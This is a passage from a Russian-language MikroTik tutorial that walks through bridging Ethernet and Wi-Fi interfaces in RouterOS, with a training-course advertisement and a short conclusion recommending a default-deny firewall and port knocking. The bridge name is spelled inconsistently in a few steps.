    Для роутеров в Wi-Fi антенной необходимо объединить оба типа интерфейса, для того чтобы пользователи различных типов подключений видели друг друга.

    Для этого требуется выполнить следующие действия:

    • открыть раздел «Bridge»;
    • нажать кнопку «Add»;
    • в поле с названием «Name» вписать имя «bridge-local»;
    • нажать «ОК».

    Далее нужно объединить Ethernet-порты:

    • зайти во вкладку «Ports»;
    • нажать кнопку «Add»;
    • в списке «Interface» выбрать главный порт, в данном случае это «ether2»;
    • в списке «Bridge» выбрать ранее созданное соединение «brifge-local»;
    • нажать «ОК».

    Для добавления Wi-Fi подключений необходимо:

    • открыть вкладку «Ports»;
    • нажать кнопку «Add»;
    • в списке «Interface» выбрать главный порт «wlan1»;
    • в списке «Bridge» выбрать объединение «bridgelocal»;
    • нажать кнопку «ОК».

    Онлайн курсы по Mikrotik

    Если у вас есть желание научиться работать с роутерами микротик и стать специалистом в этой области, рекомендую пройти курсы по программе, основанной на информации из официального курса MikroTik Certified Network Associate. Помимо официальной программы, в курсах будут лабораторные работы, в которых вы на практике сможете проверить и закрепить полученные знания. Все подробности на сайте . Стоимость обучения весьма демократична, хорошая возможность получить новые знания в актуальной на сегодняшний день предметной области. Особенности курсов:

    • Знания, ориентированные на практику;
    • Реальные ситуации и задачи;
    • Лучшее из международных программ.

    Выход

    На сегодняшний день единственным верным решением для защиты RouterOS — это корректно настроенный фаервол, который работает по принципу «запрещено всё, что явно не разрешено». А всё потому, что Микротик использует классический фаервол Linux, который годами оттачивался армией специалистов.
    Если требуется доступ к устройству из глобальной сети, то используйте принцип «port knocking». Принцип «fail2ban» себя не всегда оправдывает, так как всё равно обнаруживает устройство.

    Добавить комментарий